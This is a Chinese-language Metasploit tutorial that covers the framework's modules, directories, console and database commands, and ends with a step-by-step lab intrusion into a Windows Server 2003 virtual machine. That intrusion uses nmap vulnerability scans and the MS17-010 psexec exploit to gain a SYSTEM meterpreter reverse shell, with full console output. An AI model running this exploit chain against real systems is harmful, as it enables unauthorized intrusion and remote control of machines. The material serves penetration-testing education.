Metasploit框架(1), 简介, 主要模块, 目录, 基本命令, 入侵案例
Metasploit是一款开源的 安全漏洞 检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的 安全风险 情报。 这些功能包括智能开发, 代码审计 ,Web应用程序扫描, 社会工程 。
一, 主要模块
辅助模块(Aux)
渗透攻击模块(Exploits)
后渗透攻击模块(Post)
攻击载荷模块(payloads)
编码器模块(Encoders)
空指令模块(Nops)
二, 目录构成
主目录: /usr/share/metasploit-framework
config #metasploit的环境配置信息,数据库配置信息
data #后渗透模块的一些工具及payload,第三方小工具集合,用户字典等数据信息
db #rails编译生成msf的web框架时的数据库信息
documentation #用户说明文档及开发文档
externa1 #metasploit的一些基础扩展模块
lib #metasploit的一些基础类和第三方模块类
log #msf运行时的一些系统信息和其他信息
modules #metasploit的系统工具模块,包括辅助模块(auxiliary),渗模块(exploits),攻击荷载(payloads)和后渗透模块(posts),以及空字段模块(nops)和编码模块(Encoders)
msfbinscan #对bin文件进行文件偏移地址扫描
msfcli #metasploit命令行模式,可以快速调用有效的payload进行攻击,新版本的metasploit即将在2015年6月18日弃用
msfconsole #metasploit的基本命令行,集成了各种功能。
msfd #metasploit服务,非持久性服务
msfelfscan #对1inux的elf文件偏移地址进行扫描
msfencode #metasploit的编码模块,可以对mepayload和she11code进行编码输出
msfpayload #metasploit攻击荷载,用以调用不同的攻击荷载,生成和输出不同格式的she11ocode,新版本用msfvenmon替代。
msfmachscan #同msfelfscan
msfpescan #对windows的pe格式文件偏移地址进行扫描
msfrop #对windows的pe进行文件地址偏移操作,可以绕过alsr等
msfrpc #metasploit的服务端,非持久性的rpc服务
msfrpcd #持久性的metasploit本地服务,可以给远程用户提供rpc服务以及其他的http服务,可以通过xm1进行数据传输。
msfupdate #metasploit更新模块,可以用来更新metasploit模块
msfvenom #集成了msfpaylad和msfencode的功能,效率更高,即将替代msf payload和msfencode
p]ugins #metasploit的第三方插件接口
scripts #metasplit的常用后渗透模,区别于data里的后渗透模块,不需要加post参数和绝对路径,可以直接运行
test #metasploit的基本测试目录
too1s #额外的小工具和第三方脚本工具
三, 基本命令
常用命令:
msfconsole #启动MSF console, 进入msf控制台
search #搜索模块
info #查看当前模块的详细信息
use #使用模块
show options #显示模块的参数,show mssing可以查看当前有哪些的配置没有设置
set/unset #设置变量/取消变量设置
run/exploit #运行漏洞模块
back #从模块上下文退回到msfconsole初始目录
其他命令:
msfupdate #msf版本更新,目前使用apt update进行更新
help/? #打印当下窗口的帮助文档
help command/command --help #印command命令的帮助文栏
connect #可以看成是msfconsole界面下的nc工具
edit #编辑模块的ruby文件,与用vim编辑相同
show advanced #不常用的高级选项,不会在~show options~中显示
setg/unsetg #设器全局变量/取消全局变量设置,只会设胃当前msf运行环境中的变量,退出msf后设置就复位
save #将设置保存到/root/.msf4/config,msf启动时会读取该文件,这样重新启动msf后设置依然保留
sessions #可以看见当前已经建立的攻击连接,利用~sessions -i id命令进入指定连接
jobs#查看后台运行的模块
load/unload #连接插件,如load openvas,然后会出现相应的openvas命今,使用时需要用openvas_connect连接外部扫描器
loadpath #调用自己编写的功能模块
route #向session指定路由
resource #调用rc文件的命令并执行,以方便直接取得session
searchsploit命令:
在系统shell下执行, 用于直接搜索exploits.
搜索 thinkphp 相关的模块:
searchsploit thinkphp
--------------------------------------------------------------------- ---------------------------------Exploit Title | Path
--------------------------------------------------------------------- ---------------------------------
ThinkPHP - Multiple PHP Injection RCEs (Metasploit) | linux/remote/48333.rb
ThinkPHP 2.0 - 'index.php' Cross-Site Scripting | php/webapps/33933.txt
ThinkPHP 5.0.23/5.1.31 - Remote Code Execution | php/webapps/45978.txt
ThinkPHP 5.X - Remote Command Execution | php/webapps/46150.txt
--------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
查询exploits文件详情:
searchsploit -p 48333
Exploit: ThinkPHP - Multiple PHP Injection RCEs (Metasploit)URL: https://www.exploit-db.com/exploits/48333Path: /usr/share/exploitdb/exploits/linux/remote/48333.rbCodes: CVE-2019-9082, CVE-2018-20062Verified: True
File Type: Ruby script, ASCII text
四, MSFDB数据库操作
MSF默认使用Kali内置的PostgreSQL数据库,也可以修改为MySQL。
1. PostgreSQL命令
systemctl status postgresql 查看数据库服务状态
sudo -u postgres psql postgres 进入PSQL数据库命令行
\l 查看数据库列表
\c msf 切换到 msf 数据库
\d 查看当前数据库的所有表
\d users 查看users表的列
\q 退出
SQL语句: 一般sql语句
2. 数据库管理命令
需要在系统shell下执行。
msfdb init 初始化数据库
msfdb reinit 重新初始化
msfdb delete 删除数据库
msfdb start 启动数据库
msfdb stop 停止数据库
msfdb status 查看数据库状态
3. msf数据库操作命令
需要在msf控制台执行。
db_connect # db_connect msf:admin@127.0.0.1:3306/msf 连接数据库, 前一个msf:用户名,admin: 密码,后一个msf:数据库名称
db_disconnect
db_status #查看数据库状态,有无连接
db_nmap #后续可以用hosts命令来查询扫描出的主机, db_nmap -O 192.168.112.200
db_rebui1d_cache#建立模块文件的缓存,使search搜索速度更快
db_remove
db_export #导出备份信息
db_import #导入备份信息,备份为xm1文件
五, 入侵案例
本案例以入侵 windows server 2003 为例.
目标主机: 192.168.112.205
1. 进入msf
msfconsole
2. nmap 搜集信息
这里是直接在msf内使用nmap, 所以命令是db_nmap
, 而不是nmap
.
扫描系统信息:
db_nmap -O 192.168.112.205
Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-27 23:05 EST
Nmap scan report for 192.168.112.205 (192.168.112.205)
Host is up (0.0011s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
MAC Address: 00:0C:29:AF:2B:D0 (VMware)
Device type: general purpose
Running: Microsoft Windows 2003
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2
OS details: Microsoft Windows Server 2003 SP1 or SP2
Network Distance: 1 hopOS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.85 seconds
扫描漏洞信息
db_nmap --script=vuln 192.168.112.205
[*] Nmap: Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-27 23:06 EST
[*] Nmap: Nmap scan report for 192.168.112.205 (192.168.112.205)
[*] Nmap: Host is up (0.0030s latency).
[*] Nmap: Not shown: 996 closed tcp ports (reset)
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 135/tcp open msrpc
[*] Nmap: 139/tcp open netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds
[*] Nmap: 1025/tcp open NFS-or-IIS
[*] Nmap: MAC Address: 00:0C:29:AF:2B:D0 (VMware)
[*] Nmap: Host script results:
[*] Nmap: |_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
[*] Nmap: |_smb-vuln-ms10-054: false
[*] Nmap: | smb-vuln-ms08-067:
[*] Nmap: | VULNERABLE:
[*] Nmap: | Microsoft Windows system vulnerable to remote code execution (MS08-067)
[*] Nmap: | State: VULNERABLE
[*] Nmap: | IDs: CVE:CVE-2008-4250
[*] Nmap: | The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
[*] Nmap: | Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
[*] Nmap: | code via a crafted RPC request that triggers the overflow during path canonicalization.
[*] Nmap: |
[*] Nmap: | Disclosure date: 2008-10-23
[*] Nmap: | References:
[*] Nmap: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
[*] Nmap: |_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
[*] Nmap: | smb-vuln-ms17-010:
[*] Nmap: | VULNERABLE:
[*] Nmap: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
[*] Nmap: | State: VULNERABLE
[*] Nmap: | IDs: CVE:CVE-2017-0143
[*] Nmap: | Risk factor: HIGH
[*] Nmap: | A critical remote code execution vulnerability exists in Microsoft SMBv1
[*] Nmap: | servers (ms17-010).
[*] Nmap: |
[*] Nmap: | Disclosure date: 2017-03-14
[*] Nmap: | References:
[*] Nmap: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
[*] Nmap: | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
[*] Nmap: |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 39.98 seconds
这里可以看到 smb-vuln-ms08-067
, smb-vuln-ms17-010
漏洞可能利用.
3. 搜索漏洞模块
我们以 smb-vuln-ms17-010 为例搜索:
search ms17-010
atching Modules
================# Name Disclosure Date Rank Check Description- ---- --------------- ---- ----- -----------0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Cde Execution2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Cmmand Execution3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code ExecutionInteract with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
这里一共列出了5个相关的模块.
4. 进入漏洞模块
我们以1号模块ms17_010_psexec
为例, 根据编号使用它:
use 1
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_psexec) >
这里看到Shell 提示符变成了exploit(windows/smb/ms17_010_psexec) >
说明进入模块.
5. 配置模块参数
show options
Module options (exploit/windows/smb/ms17_010_psexec):Name Current Setting Required Description---- --------------- -------- -----------DBGTRACE false yes Show extra debug trace infoLEAKATTEMPTS 99 yes How many times to try to leak transactionNAMEDPIPE no A named pipe that can be connected to (leave blank for auto)NAMED_PIPES /usr/share/metasploit-framework/data/word yes List of named pipes to checklists/named_pipes.txtRHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htmlRPORT 445 yes The Target port (TCP)SERVICE_DESCRIPTION no Service description to be used on target for pretty listingSERVICE_DISPLAY_NAME no The service display nameSERVICE_NAME no The service nameSHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder shareSMBDomain . no The Windows domain to use for authenticationSMBPass no The password for the specified usernameSMBUser no The username to authenticate asPayload options (windows/meterpreter/reverse_tcp):Name Current Setting Required Description---- --------------- -------- -----------EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)LHOST 192.168.112.201 yes The listen address (an interface may be specified)LPORT 4444 yes The listen portExploit target:Id Name-- ----0 AutomaticView the full module info with the info, or info -d command.
这里rhost参数表示目标ip, 它是必选的, 所以设置它:
set rhost 192.168.112.205
rhost => 192.168.112.205
设置完参数可以重新使用 show options
重新检查一下.
6. 执行漏洞模块
run
[*] Started reverse TCP handler on 192.168.112.201:4444
[*] 192.168.112.205:445 - Target OS: Windows Server 2003 R2 3790 Service Pack 2
[*] 192.168.112.205:445 - Filling barrel with fish... done
[*] 192.168.112.205:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 192.168.112.205:445 - [*] Preparing dynamite...
[*] 192.168.112.205:445 - Trying stick 1 (x64)...Miss
[*] 192.168.112.205:445 - [*] Trying stick 2 (x86)...Boom!
[*] 192.168.112.205:445 - [+] Successfully Leaked Transaction!
[*] 192.168.112.205:445 - [+] Successfully caught Fish-in-a-barrel
[*] 192.168.112.205:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 192.168.112.205:445 - Reading from CONNECTION struct at: 0x87b59880
[*] 192.168.112.205:445 - Built a write-what-where primitive...
[+] 192.168.112.205:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.112.205:445 - Selecting native target
[*] 192.168.112.205:445 - Uploading payload... PqTGuwAK.exe
[*] 192.168.112.205:445 - Created \PqTGuwAK.exe...
[+] 192.168.112.205:445 - Service started successfully...
[*] 192.168.112.205:445 - Deleting \PqTGuwAK.exe...
[*] Sending stage (175686 bytes) to 192.168.112.205
[*] Meterpreter session 1 opened (192.168.112.201:4444 -> 192.168.112.205:1028) at 2023-11-27 23:26:32 -0500meterpreter >
这里看到Shell提示符变成了 meterpreter >
说明已经入侵并连接了目标系统, 可以执行各种系统命令了.比如ps命令显示目标系统的进程:
meterpreter > ps
Process List
============PID PPID Name Arch Session User Path--- ---- ---- ---- ------- ---- ----0 0 [System Process]4 0 System x86 0 NT AUTHORITY\SYSTEM172 2016 vmtoolsd.exe x86 0 ROOT-97473D4E73\Administrator C:\Program Files\VMware\VMware Tools\vmtoolsd.exe264 4 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe312 264 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe336 264 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe384 336 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe396 336 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe432 596 wmiprvse.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\wbem\wmiprvse.exe576 384 vmacthlp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe596 384 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe660 2016 ctfmon.exe x86 0 ROOT-97473D4E73\Administrator C:\WINDOWS\system32\ctfmon.exe676 384 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe736 384 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe764 384 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe780 384 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe976 384 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe1004 384 msdtc.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\msdtc.exe1080 384 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe1120 384 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe1208 384 VGAuthService.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe1276 384 vmtoolsd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe1404 384 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe1436 2028 rundll32.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\rundll32.exe1540 384 dllhost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\dllhost.exe1660 596 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe2016 1992 explorer.exe x86 0 ROOT-97473D4E73\Administrator C:\WINDOWS\Explorer.EXE2628 2016 cmd.exe x86 0 ROOT-97473D4E73\Administrator C:\WINDOWS\system32\cmd.exe2644 2628 conime.exe x86 0 ROOT-97473D4E73\Administrator C:\WINDOWS\system32\conime.exe2716 780 wuauclt.exe x86 0 ROOT-97473D4E73\Administrator C:\WINDOWS\system32\wuauclt.exe
7. 退出连接
exit
[*] Shutting down Meterpreter...[*] 192.168.112.205 - Meterpreter session 1 closed. Reason: User exit
msf6 exploit(windows/smb/ms17_010_psexec) >
看到命令提示符回到了exploit(windows/smb/ms17_010_psexec) >
.
8. 退出模块
back
msf6 >
看到命令提示符回到了msf6 >
. 已经退出模块.